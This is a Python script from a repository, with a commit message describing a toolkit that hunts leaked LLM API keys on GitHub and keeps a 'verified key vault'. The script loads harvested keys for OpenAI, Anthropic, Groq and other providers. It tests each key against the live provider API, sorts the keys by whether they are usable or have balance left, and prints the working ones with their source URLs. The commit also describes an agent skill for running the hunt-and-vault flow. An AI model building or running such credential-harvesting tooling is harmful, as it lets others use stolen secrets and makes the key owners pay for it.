Files
hack/tools/scripts/llm-key-hunter/hunt_medium.py
T
chaos 5d215e1649 Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*,
  pivot miner, two-layer verify/content caches, per-provider verification)
- usable_keys: verified key vault across 12 providers (deepseek, minimax,
  volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.)
- .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow
- NewAPI channel import scripts and CDP capture helpers
- Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
2026-08-02 06:02:58 +08:00

292 lines
11 KiB
Python

#!/usr/bin/env python3
"""Deep-verify the 'medium' providers in one pass.
Providers: Groq, TogetherAI, OpenAI, Anthropic, SiliconFlow,
LingyiWanwu (01), StepFun.
For every key in results/extracted_keys.txt whose provider matches,
we:
1. Validate the key against the provider's documented regex.
2. Send a cheap chat completion (or /models GET) request.
3. Classify by the now-familiar rule: only 401 = DEAD; anything
else (200 / 400 / 402 / 403 / 404 / 429 / 5xx) is kept.
Outputs per provider under results/medium/<Provider>/.
"""
import argparse
import json
import re
import sys
import time
import urllib.request
import urllib.error
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
HERE = Path(__file__).parent
sys.path.insert(0, str(HERE))
from verify_cache import CachedVerifier
SOURCE = HERE / "results" / "extracted_keys.txt"
OUT_ROOT = HERE / "results" / "medium"
OUT_ROOT.mkdir(parents=True, exist_ok=True)
UA = "curl/8.5.0"
# ── Provider configs ────────────────────────────────────────────
# Each entry:
# key_re : regex the full key must match (after provider tag)
# fakes : substrings that mark a placeholder
# requests : list of (name, method, path, headers, body) to try in order.
# {key} is substituted; stop early once a better verdict found.
def openai_like(base, model, key_header="Authorization", scheme="Bearer"):
return [
{
"name": f"chat:{model}",
"method": "POST",
"url": f"{base}/v1/chat/completions",
"headers": {key_header: f"{scheme} {{key}}", "Content-Type": "application/json"},
"body": {"model": model, "messages": [{"role": "user", "content": "hi"}], "max_tokens": 1},
},
{
"name": "models",
"method": "GET",
"url": f"{base}/v1/models",
"headers": {key_header: f"{scheme} {{key}}"},
"body": None,
},
]
PROVIDERS = {
"Groq": {
"key_re": re.compile(r"^gsk_[A-Za-z0-9]{48,}$"),
"fakes": ("your-", "example", "xxxx"),
"requests": openai_like("https://api.groq.com", "llama-3.1-8b-instant"),
},
"TogetherAI": {
"key_re": re.compile(r"^[0-9a-f]{64}$"),
"fakes": ("0" * 64,),
"requests": openai_like("https://api.together.xyz", "meta-llama/Llama-3.2-3B-Instruct-Turbo"),
},
"OpenAI": {
# Real OpenAI keys: sk-... (48-ish chars) or sk-proj-... (longer).
# We deliberately exclude keys that look like other providers'
# (sk-ant handled separately, T3BlbkFJ is a classic OpenAI marker).
"key_re": re.compile(r"^sk-(?:proj-[A-Za-z0-9_-]{20,}|[A-Za-z0-9]{48})$"),
"fakes": ("your-", "example", "xxxx", "sk-000000"),
"requests": openai_like("https://api.openai.com", "gpt-4o-mini"),
},
"Anthropic": {
"key_re": re.compile(r"^sk-ant-[A-Za-z0-9_\-]{40,}$"),
"fakes": ("your-", "example", "xxxx"),
"requests": [
{
"name": "messages",
"method": "POST",
"url": "https://api.anthropic.com/v1/messages",
"headers": {
"x-api-key": "{key}",
"anthropic-version": "2023-06-01",
"Content-Type": "application/json",
},
"body": {"model": "claude-3-5-haiku-20241022",
"messages": [{"role": "user", "content": "hi"}],
"max_tokens": 1},
},
{
"name": "models",
"method": "GET",
"url": "https://api.anthropic.com/v1/models",
"headers": {"x-api-key": "{key}", "anthropic-version": "2023-06-01"},
"body": None,
},
],
},
"SiliconFlow": {
"key_re": re.compile(r"^sk-[a-zA-Z0-9]{40,}$"),
"fakes": ("your-", "example", "xxxx"),
"requests": openai_like("https://api.siliconflow.cn", "Qwen/Qwen2.5-7B-Instruct"),
},
"LingyiWanwu": {
"key_re": re.compile(r"^sk-[a-zA-Z0-9]{40,}$"),
"fakes": ("your-", "example", "xxxx"),
"requests": openai_like("https://api.lingyiwanwu.com", "yi-large"),
},
"StepFun": {
"key_re": re.compile(r"^sk-[a-zA-Z0-9]{40,}$"),
"fakes": ("your-", "example", "xxxx"),
"requests": openai_like("https://api.stepfun.com", "step-1-flash"),
},
}
RANK = {"USABLE": 4, "NO_BALANCE": 3, "NO_ACCESS": 2, "UNKNOWN": 1, "DEAD": 0}
def http_request(method, url, headers, body, timeout=20):
h = {"User-Agent": UA, "Accept": "*/*", **headers}
data = json.dumps(body).encode() if body is not None else None
req = urllib.request.Request(url, data=data, headers=h, method=method)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
return resp.getcode(), resp.read().decode("utf-8", errors="replace")
except urllib.error.HTTPError as e:
try:
return e.code, e.read().decode("utf-8", errors="replace")
except Exception:
return e.code, ""
except Exception as e:
return 0, f"network: {type(e).__name__}: {e}"
def classify(code, body):
bl = (body or "").lower()
if code == 200:
if '"choices"' in bl or '"data"' in bl or '"id"' in bl:
return "USABLE", "200 OK"
if any(x in bl for x in ("balance", "quota", "arrearage", "insufficient")):
return "NO_BALANCE", body[:140]
return "USABLE", body[:140]
if code in (402, 429):
return "NO_BALANCE", f"HTTP {code}: {body[:140]}"
if code == 401:
return "DEAD", "401 unauthorized"
if code == 0:
return "UNKNOWN", body[:160]
# 400 / 403 / 404 / 5xx — key may be valid, model/endpoint issue
return "NO_ACCESS", f"HTTP {code}: {body[:140]}"
def verify(provider, key):
cfg = PROVIDERS[provider]
best, best_detail = "DEAD", ""
for req in cfg["requests"]:
headers = {h: v.replace("{key}", key) for h, v in req["headers"].items()}
code, body = http_request(req["method"], req["url"], headers, req["body"])
v, d = classify(code, body)
d = f"[{req['name']}] {d}"
if RANK[v] > RANK[best]:
best, best_detail = v, d
if best == "USABLE":
return best, best_detail
return best, best_detail
def load_keys(provider):
cfg = PROVIDERS[provider]
keys = {}
if not SOURCE.exists():
return keys
with open(SOURCE) as f:
for line in f:
line = line.strip()
if not line.startswith(f"{provider}|"):
continue
parts = line.split("|", 3)
if len(parts) < 3:
continue
key = parts[1]
url = parts[2] if len(parts) > 2 else ""
low = key.lower()
if any(x in low for x in cfg["fakes"]):
continue
if not cfg["key_re"].match(key):
continue
if key not in keys:
keys[key] = url
return keys
def run_provider(provider, workers, limit, force_cache=False):
keys = load_keys(provider)
out_dir = OUT_ROOT / provider
out_dir.mkdir(parents=True, exist_ok=True)
print(f"\n=== {provider}: {len(keys)} unique keys matching regex ===")
if limit:
keys = dict(list(keys.items())[:limit])
print(f" (limited to first {limit})")
if not keys:
return
buckets = {k: [] for k in RANK}
start = time.time()
processed = 0
with CachedVerifier(f"medium_{provider.lower()}",
lambda k, _p=provider: verify(_p, k),
force=force_cache) as ver:
with ThreadPoolExecutor(max_workers=workers) as pool:
futs = {pool.submit(ver, k): (k, s) for k, s in keys.items()}
for fut in as_completed(futs):
k, s = futs[fut]
processed += 1
try:
verdict, detail = fut.result()
except Exception as e:
verdict, detail = "UNKNOWN", str(e)
buckets[verdict].append((k, s, detail))
if processed % 50 == 0:
el = time.time() - start
print(f" [{processed}/{len(keys)}] "
f"usable={len(buckets['USABLE'])} "
f"nobal={len(buckets['NO_BALANCE'])} "
f"noacc={len(buckets['NO_ACCESS'])} "
f"unk={len(buckets['UNKNOWN'])} "
f"dead={len(buckets['DEAD'])} "
f"hit={ver.hits} live={ver.live} "
f"({processed/el:.1f}/s)")
print(f" cache: {ver.hits} hits, {ver.live} live, {len(ver._cache)} cached")
el = time.time() - start
print(f" done in {el:.1f}s")
for n in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
print(f" {n:11s}: {len(buckets[n])}")
name_map = {
"USABLE": "usable.txt",
"NO_BALANCE": "no_balance.txt",
"NO_ACCESS": "no_access.txt",
"UNKNOWN": "unknown.txt",
"DEAD": "dead.txt",
}
for n, fn in name_map.items():
with open(out_dir / fn, "w") as f:
for k, s, d in sorted(buckets[n]):
f.write(f"{k}|{s}|{d}\n")
with open(out_dir / "all_non_401.txt", "w") as f:
for n in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN"):
for k, s, d in sorted(buckets[n]):
f.write(f"{n}|{k}|{s}|{d}\n")
if buckets["USABLE"]:
print(f" --- USABLE {provider} keys ---")
for k, s, d in buckets["USABLE"][:30]:
print(f" {k} {d[:80]}")
print(f" src: {s}")
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--providers", default="all",
help="Comma-separated list, or 'all'")
ap.add_argument("--workers", type=int, default=15)
ap.add_argument("--limit", type=int, default=0)
ap.add_argument("--no-cache", action="store_true")
args = ap.parse_args()
if args.providers == "all":
providers = list(PROVIDERS.keys())
else:
providers = [p.strip() for p in args.providers.split(",") if p.strip() in PROVIDERS]
unknown = [p for p in args.providers.split(",") if p.strip() not in PROVIDERS]
if unknown:
print(f"Unknown providers: {unknown}", file=sys.stderr)
print(f"Verifying: {', '.join(providers)}")
for p in providers:
run_provider(p, args.workers, args.limit, args.no_cache)
if __name__ == "__main__":
main()